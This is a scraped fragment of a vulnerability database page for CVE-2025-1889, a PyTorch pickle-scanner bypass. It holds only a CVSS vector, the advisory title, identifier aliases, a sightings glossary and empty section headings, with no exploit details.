      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "PyTorch Model Files Can Bypass Pickle Scanners via Unexpected Pickle Extensions"
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2025-1889 (GCVE-0-2025-1889)

PYSEC-2025-19

FKIE_CVE-2025-1889

GHSA-769V-P64C-89PR

CVE-2025-1889

Summary

Details

PoC

Impact

Recommendations

Tags

Sightings

Nomenclature